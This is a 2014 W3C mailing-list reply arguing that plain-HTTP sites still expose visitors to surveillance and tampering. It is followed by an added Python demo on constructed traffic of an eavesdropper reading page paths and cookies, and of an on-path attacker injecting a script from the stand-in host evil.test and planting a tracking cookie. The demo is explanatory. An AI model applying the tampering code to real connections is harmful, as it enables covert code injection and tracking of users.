Re: Fwd (TAG): Draft finding - "Transitioning the Web to HTTPS"

On Dec 19, 2014, at 1:25 PM, Eric J. Bowman <eric@bisonsystems.net> wrote:
> 
> David Singer wrote:
> 
>> 4) A discussion of the point from web-sites “look, all my content is
>> public, I have nothing to hide and hence nothing to secure” maybe
>> needs addressing?  (“You may not, but you are exposing your
>> customers/visitors by insisting on plain HTTP.”)
> 
> Yes. I don't use cookies, so I don't understand what I'm exposing
> visitors to by stubbornly insisting on HTTP. My site visitors seem to
> be at greater risk by using their CC's at Sony or Target or...

It does seem like it would be useful for the TAG finding to explicitly address this point.

To summarize, sites are still exposing information about their users when they force visitors to use HTTP, even if there are no authentication cookies. In particular, the user’s reading habits are exposed (which page on your site are they reading? does that page contain words of political interest?). Non-authentication cookies are used to surveil users or identify them for more invasive attacks [0].

Also, without integrity guarantees, HTTP sites expose their users to the risk of running any script the attacker wishes to introduce, including potentially asking for access to sensitive device APIs. Network attackers can also introduce identifiers or modify content for HTTP browsing. That is, integrity also helps with confidentiality and other privacy concerns [1].

Nick

[0] https://freedom-to-tinker.com/blog/englehardt/how-cookies-can-be-used-for-global-surveillance/
[1] Very well, I repeat myself: http://lists.w3.org/Archives/Public/public-web-security/2014Dec/0007.html

Received on Friday, 19 December 2014 22:36:34 UTC
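The two exposures described in the message above (a passive observer learning which page a visitor reads and which cookie identifies them, and an on-path attacker rewriting the response to inject script and plant an identifier), as an added example that is not part of the original thread or of any W3C code. All traffic, hostnames and cookie names below are constructed for the demonstration.

```python
"""Added example, not part of the original thread: what a network attacker
sees in, and can change in, plaintext HTTP even when the site sets no
authentication cookie. Every message below is constructed for the demo;
the hostnames (example-news.test, evil.test) and cookie names are made up."""

from typing import List, Tuple

Header = Tuple[str, str]


def parse_http_message(raw: bytes) -> Tuple[str, List[Header], bytes]:
    """Split a raw HTTP/1.1 message into start line, headers and body.
    Header names are kept as sent; lookups below are case-insensitive."""
    head, _sep, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers: List[Header] = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def get_header(headers: List[Header], name: str) -> str:
    for k, v in headers:
        if k.lower() == name.lower():
            return v
    return ""


def set_header(headers: List[Header], name: str, value: str) -> None:
    for i, (k, _) in enumerate(headers):
        if k.lower() == name.lower():
            headers[i] = (k, value)
            return
    headers.append((name, value))


def serialize(start_line: str, headers: List[Header], body: bytes) -> bytes:
    head = start_line + "\r\n" + "".join(f"{k}: {v}\r\n" for k, v in headers)
    return head.encode("iso-8859-1") + b"\r\n" + body


# --- Constructed traffic -------------------------------------------------

# What the visitor's browser sends over plain HTTP to read one public article.
REQUEST = (
    b"GET /articles/election-reform HTTP/1.1\r\n"
    b"Host: example-news.test\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Cookie: _ga=GA1.2.123456789.1418900000\r\n"   # analytics cookie, not auth
    b"\r\n"
)

PAGE = b"<html><body><h1>Election reform</h1><p>Public text.</p></body></html>"
RESPONSE = serialize(
    "HTTP/1.1 200 OK",
    [("Content-Type", "text/html; charset=utf-8"),
     ("Content-Length", str(len(PAGE)))],
    PAGE,
)


def passive_observer(request: bytes) -> dict:
    """A passive eavesdropper (shared Wi-Fi, ISP, transit provider) learns
    which page was read and any identifier the site's cookies carry.
    Over HTTPS the same observer sees only the destination and byte counts."""
    start_line, headers, _body = parse_http_message(request)
    _method, target, _version = start_line.split(" ", 2)
    cookies = {}
    for pair in get_header(headers, "Cookie").split(";"):
        if "=" in pair:
            k, _, v = pair.strip().partition("=")
            cookies[k] = v
    return {"host": get_header(headers, "Host"), "path": target, "cookies": cookies}


def active_attacker(response: bytes, script_tag: str) -> bytes:
    """An on-path attacker rewrites the response in transit: injects a script
    that will run in the site's origin, plants a tracking cookie, and
    recomputes Content-Length so the browser accepts the tampered body."""
    start_line, headers, body = parse_http_message(response)
    tampered = body.replace(b"</body>", script_tag.encode() + b"</body>", 1)
    set_header(headers, "Content-Length", str(len(tampered)))
    set_header(headers, "Set-Cookie", "isp_track=a1b2c3; Max-Age=31536000")  # made-up name
    return serialize(start_line, headers, tampered)


def body_is_consistent(response: bytes) -> bool:
    """One check a plain-HTTP client does perform: body length matches the
    header. Nothing else in HTTP lets it tell the tampered page from the real one."""
    _s, headers, body = parse_http_message(response)
    return int(get_header(headers, "Content-Length")) == len(body)


if __name__ == "__main__":
    print(passive_observer(REQUEST))
    forged = active_attacker(RESPONSE, '<script src="http://evil.test/t.js"></script>')
    print(forged.decode("iso-8859-1"))
    print("client accepts tampered response:", body_is_consistent(forged))
```

The point of the two functions is the asymmetry: the eavesdropper needs nothing more than a header parser to learn the article path and the `_ga` identifier, and the active attacker's only real work is recomputing Content-Length, after which the browser has no signal that the page or the cookie did not come from the site. Over HTTPS the same bytes are opaque ciphertext and any modification fails the record MAC, which is why integrity and confidentiality are argued together in the message.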